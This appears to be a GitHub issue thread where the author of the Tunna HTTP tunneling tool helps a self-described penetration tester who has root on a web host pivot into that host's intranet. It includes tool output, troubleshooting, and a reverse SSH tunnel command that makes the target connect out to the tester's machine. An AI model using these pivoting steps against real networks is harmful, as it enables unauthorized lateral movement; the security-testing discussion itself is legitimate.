python proxy.py -u http://xxx.jsp -l 1234 -v

[ypde]

Tunna v1.1a, for HTTP tunneling TCP connections by Nikos Vassakis http://www.secforce.com / nikos.vassakis secforce.com ###############################################################

[+] Spawning keep-alive thread

[-] Keep-alive thread exited [!] Received Interrupt or Something Went Wrong [-] Disconnected

[nvssks]

Are you using it as a socks4 server or trying to connect to a specific port at the target?

[voidfyoo]

Hi, I also have the same problem :

$ python proxy.py -u http://x.x.x.x:8181/lang/conn.php -l 6666 -v

Tunna v1.1a, for HTTP tunneling TCP connections by Nikos Vassakis http://www.secforce.com / nikos.vassakis secforce.com ###############################################################

[+] Sending File [Server] File Uploaded at /tmp/901-socks4aServer.py [+] Spawning keep-alive thread [Server] All good to go, ensure the listener is working ;-)

[-] Keep-alive thread exited [!] Received Interrupt or Something Went Wrong [-] Disconnected

---

Can you tell me how to solve it ? Thanks.

[nvssks]

Does it exit immediately or when you try to proxy the connection?

[voidfyoo]

It exits immediately, before I try to proxy.

[nvssks]

Could you tell me the version of php and the underlying system and I'll try to replicate.

[voidfyoo]

Ok, this is the output I run these commands in the target host :

---

/usr/www/lang # php -v PHP 5.6.9 (cli) (built: Mar 28 2017 12:56:09) Copyright (c) 1997-2015 The PHP Group Zend Engine v2.6.0, Copyright (c) 1998-2015 Zend Technologies

/usr/www/lang # uname -a Linux TNAS-1DEF 4.0.0 #306 SMP Mon Mar 27 17:02:54 CST 2017 x86_64 GNU/Linux

/usr/www/lang # iptables -L /bin/sh: iptables: not found

---

Another information is that I also tried some other proxy and forward tools like Tunna such as reGeorg and s5.py, they also all failed. After a discussion with my firend, I guess that this problem is not due to Tunna but is about the target machine. Maybe there are some network filters or limits in the target host, but I couldn't find anything like firewall ( you can see the result of command iptables. I also run ps aux and find nothing seems like firewall ), so I guess there maybe some limits or filters at the hardware level.

Anyway, I'm unfamiliar with these networking things. These are all my guess. How do you think about this ?

[nvssks]

I initially thought it might be python not installed on the target host but you wouldn't be able to run s5.py at all. It might be php's configuration killing long running threads and both Tunna and reGeorg use the same technique for socket persistence - which is a long running thread.

Does running Tunna without the socks server work?

Also, what are you trying to achieve? I might be able to point you to another direction.

[voidfyoo]

Does running Tunna without the socks server work?

Emmmm... You mean add --no-socks option ? I tried, and got the same error.

---

I'm doing a penetration test. I have gained root privileges of the web host, now I want to use it as a springboard to access other hosts in the compromised host's Intranet. Installing penetration tools on the compromised host may not be suitable, and some service like web or rdp couldn't be accessed only via terminal, so I think I may need some proxy and forward tools to help me to do it.

At first my thought was use this host as a proxy, so I can use proxychains + nmap in my host to scan their Intranet, but as I have said, proxy tools all failed. So I wrote a small Python script, I ran it on the target host, and I did find some alive hosts. Some of these open 80 web service port, but can only be accessed in the Intranet. Now I'm confused what to do next, maybe directly write a proxy php page to request the Intranet web service? But what if I want to access 3389 rdp service in the Intranet host?

Thank you, any suggestion will be helpful ;)

[nvssks]

Can you use any other port on the server? There is a python webserver implementation for Tunna that could potentially work.

[nvssks]

Also I was experimenting with this done time ago http://www.secdev.org/projects/tuntap_udp/files/tunproxy.py

It essentially creates a VPN-like interface (without the encryption) on the server (-s option) and client (-c option). If the kernel has the module to support it and IP forwarding is enabled on the server this could work

[voidfyoo]

It seems that I can't use any other port on the server. I have tried to open another port for socks forward proxy, I ran netstat -lnpt command found that the port was surely opened but I couldn't connect to it.

Maybe there are no more common solution, and I think I should check the specific scene carefully to find a way out according to it.

[nvssks]

Probably it is behind a firewall. The only easy alternative is to do a reverse TCP connection - make the target host connect to you and forward the port. Eg. Expose SSH on your-Machine and from the target run: ssh -fN -R 7000:localhost:7000 username@your-Machine

Now every connection to localhost:7000 on your-Machine will be forwarded to the localhost: 7000 on the target.

More here: http://www.thegeekstuff.com/2013/11/reverse-ssh-tunnel